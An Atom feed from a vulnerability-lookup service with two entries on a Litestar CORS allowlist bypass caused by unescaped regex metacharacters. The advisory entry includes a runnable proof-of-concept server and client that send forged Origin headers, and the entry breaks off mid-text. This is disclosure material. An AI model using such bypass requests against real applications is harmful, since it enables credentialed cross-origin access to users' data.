<?xml version='1.0' encoding='UTF-8'?>
<?xml-stylesheet href="/static/style.xsl" type="text/xsl"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="en">
  <id>https://cve.radiocsirt.org/rss/recent/all/10</id>
  <title>Most recent entries from all</title>
  <updated>2026-10-06T19:50:04.583438+00:00</updated>
  <author>
    <name>Vulnerability-Lookup</name>
    <email>csirt@opendfir.org</email>
  </author>
  <link href="https://cve.radiocsirt.org" rel="alternate"/>
  <generator uri="https://lkiesow.github.io/python-feedgen" version="1.0.0">python-feedgen</generator>
  <subtitle>Contains only the most 10 recent entries.</subtitle>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/cve-2026-25478</id>
    <title>CVE-2026-25478 — Litestar has a CORS origin allowlist bypass due to unescaped regex metacharacters in allowed origins</title>
    <updated>2026-10-06T19:50:04.585199+00:00</updated>
    <content type="xhtml">
      <div xmlns="http://www.w3.org/1999/xhtml"><p><strong>Affected:</strong> litestar-org litestar</p>
<p>Litestar is an Asynchronous Server Gateway Interface (ASGI) framework. Prior to 2.20.0, CORSConfig.allowed_origins_regex is constructed using a regex built from configured allowlist values and used with fullmatch() for validation. Because metacharacters are not escaped, a malicious origin can match unexpectedly. The check relies on allowed_origins_regex.fullmatch(origin). This vulnerability is fixed in 2.20.0.</p></div>
    </content>
    <link href="https://cve.radiocsirt.org/vuln/cve-2026-25478"/>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/ghsa-2p2x-hpg8-cqp2</id>
    <title>GHSA-2p2x-hpg8-cqp2 — Litestar's CORS origin allowlist has a bypass due to unescaped regex metacharacters in allowed origins</title>
    <updated>2026-10-06T19:50:04.585253+00:00</updated>
    <content type="xhtml">
      <div xmlns="http://www.w3.org/1999/xhtml"><p><strong>Affected:</strong> PyPI: litestar</p>
<p>### Summary
CORS origin validation can be bypassed because the allowed-origins allowlist is compiled into a regex without escaping metacharacters (notably .). An allowed origin like https://good.example can match https://goodXexample, resulting in Access-Control-Allow-Origin being set for an untrusted origin</p>
<p>### Details
CORSConfig.allowed_origins_regex is constructed using a regex built from configured allowlist values and used with fullmatch() for validation. Because metacharacters are not escaped, a malicious origin can match unexpectedly. The check relies on allowed_origins_regex.fullmatch(origin).</p>
<p>### PoC
Server (poc_cors_server.py)</p>
<p>```
from litestar import Litestar, get
from litestar.config.cors import CORSConfig</p>
<p>@get("/c")
async def c() -&gt; str:
    return "ok"</p>
<p>cors = CORSConfig(
    allow_origins=["https://good.example"],
    allow_credentials=True,
)
app = Litestar([c], cors_config=cors)
```</p>
<p>`uvicorn poc_cors_server:app --host 127.0.0.1 --port 8002`</p>
<p>Client (poc_cors_client.py)</p>
<p>```
import http.client</p>
<p>def req(origin: str) -&gt; tuple[int, str | None]:
    c = http.client.HTTPConnection("127.0.0.1", 8002, timeout=3)
    c.request("GET", "/c", headers={"Origin": origin, "Host": "example.com"})
    r = c.getresponse()
    r.read()
    acao = r.getheader("Access-Control-Allow-Origin")
    c.close()
    return r.status, acao</p>
<p>print("evil:", req("https://evil.example"))
print("bypass:", req("https://goodXexample")) 
```</p>
<p>Expected (vulnerable behavior):</p>
<p>Origin: https://…</p></div>
    </content>
    <link href="https://cve.radiocsirt.org/vuln/ghsa-2p2x-hpg8-cqp2"/>
  </entry>
</feed>
